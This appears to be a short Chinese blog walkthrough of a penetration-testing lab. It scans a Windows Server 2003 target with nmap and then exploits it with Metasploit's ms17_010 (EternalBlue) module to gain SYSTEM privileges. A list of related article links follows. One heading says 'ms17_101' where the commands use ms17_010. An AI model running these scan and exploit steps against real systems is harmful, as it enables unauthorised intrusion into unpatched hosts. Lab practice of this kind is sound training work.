主机 渗透

1:kali

靶机:Windows Server 2003

端口扫描

1.用nmap端口扫描靶机

nmap -sP 192.168.157.0/24 #扫描192.168.157.0这个网段存活的主机

靶机的IP为192.168.157.130

2

nmap -sV192.168.157.130 -p- #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口

msfconsole
1. ms17_101

search ms17_010 #询问有关"ms17_010"的漏洞信息

2.use

use 1 #利用1这个模块

3.options

show options #列出模块所需的各种参数

4.set

set rhosts 192.168.157.130 # 设置远程目标主机的IP地址为192.168.157.130

5.exploit

exploit #执行攻击

6.获得system32,Windows最高权限

相关推荐
忘川w9 分钟前
《网络安全与防护》知识点复习
笔记·安全·web安全·网络安全
国际云,接待1 小时前
微软云注册被阻止怎么解决?
服务器·网络·microsoft·云原生·微软·云计算
laocooon5238578861 小时前
基于Python的TCP应用案例,包含**服务器端**和**客户端**的完整代码
网络·python·tcp/ip
银空飞羽1 小时前
总结一下最近学习到的MCP风险问题(杂谈)
安全·mcp·trae
m0_694845572 小时前
日本云服务器租用多少钱合适
linux·运维·服务器·安全·云计算
小锋学长生活大爆炸3 小时前
【教程】Windows安全中心扫描设置排除文件
windows·安全·系统·扫描·病毒·安全中心
liulilittle3 小时前
通过高级处理器硬件指令集AES-NI实现AES-256-CFB算法并通过OPENSSL加密验证算法正确性。
linux·服务器·c++·算法·安全·加密·openssl
Blossom.1183 小时前
基于区块链的去中心化身份验证系统:原理、实现与应用
运维·服务器·网络·人工智能·机器学习·去中心化·区块链
SZ1701102314 小时前
HTTP 请求报文 方法
网络·网络协议·http
Bruce_Liuxiaowei4 小时前
使用Nmap探测VNC服务信息—某单位KVM设备
网络·安全·web安全